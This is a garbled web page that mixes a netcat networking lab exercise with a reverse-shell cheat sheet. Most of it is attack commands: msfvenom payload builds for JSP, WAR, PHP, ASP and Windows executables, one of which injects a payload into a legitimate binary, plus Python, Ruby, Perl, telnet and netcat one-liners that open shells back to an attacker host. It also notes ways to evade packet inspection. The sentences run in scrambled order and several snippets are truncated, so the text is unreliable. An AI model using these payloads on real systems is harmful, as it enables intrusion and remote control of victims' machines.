What happened? Can you explain why it happened? On the client type /bin/bash > /dev/tcp/ server_ip_address/9090.(Note it closed down after receiving the hello message.) From the client command line type echo hello > /dev/tcp/ server_ip_address/9090. As you probably recall from cs105, communicating between the client and server is simply a matter of writing to the appropriate file.You can find more info about the netcat command here: ) In a terminal on the server set up a tcp connection on port 9090 using the netcat command: nc -l 9090 -v.You should see a report of the time it takes for messages to go from the client to the server and back. In a terminal window on the client type ping server_ip_address.Type ifconfig in the server window to determine the server's ip address.Now ping the server from the client to be sure the connection is established.JSP msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f raw > shell. WAR msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f war > shell.war msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f raw > shell.phpĪSP msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -f asp > shell.asp You can use it on both Linux and Windows. Python python -c 'import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("ATTACKING-IP",80)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call() ' Ruby ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i exec sprintf("/bin/sh -i &%d 2>&%d",f,f,f)' Perl perl -e 'use Socket $i="ATTACKING-IP" $p=80 socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")) if(connect(S,sockaddr_in($p,inet_aton($i)))) ' Telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443 Telnet rm -f /tmp/p mknod /tmp/p p & telnet ATTACKING-IP 80 0/tmp/p If you are on a pentestjob you might not want to communicate unencrypted.īind ncat -exec cmd.exe -allow 192.168.1.101 -vnl 5555 -ssl One feature it has that netcat does not have is encryption. Ncat is a better and more modern version of netcat.
Upgrade Netcat shell to an interactive: Ncat Without -e flag rm -f /tmp/p mknod /tmp/p p & nc ATTACKING-IP 4444 0/tmp/p With -e flag nc -e /bin/sh ATTACKING-IP 80 Inject payload into binary msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -e x86/shikata_ga_nai -i 9 -x "/somebinary.exe" -o bad_binary.exe Staged payload msfvenom -p windows/shell/reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o staged_reverse_tcp.exe Non-staged payload msfvenom -p windows/shell_reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o shell_reverse_tcp.exe msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.101 LPORT=443 -f exe -o met_https_reverse.exe Since it is hidden in https the communication is encrypted and can be used to bypass deep-packet inspections. It makes the meterpreter-traffic look normal. Set payload windows/meterpreter/reverse_tcp Standard meterpreter msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -o shell_reverse.exe This can be caught with metasploit multi-handler but not with netcat. First it sends some parts of it and sets up the connection, and then it sends some more. This can be useful for when you have very small buffer for your shellcode, so you need to divide up the payload. This can be caught with metasploit multi-handler.
A non-staged shell is sent over in one block. There is an important difference between non-staged and staged payload. Many of the ones listed below comes from this cheat-sheet: This is s great collection of different types of reverse shells and webshells. MS Advanced Threat Protection and Advanced Threat Analytics Evasion Metasploit Web Delivery (Meterpreter Session)
Common ports/services and how to use themīroken Authentication or Session Managementĭefault Layout of Apache on Different Versions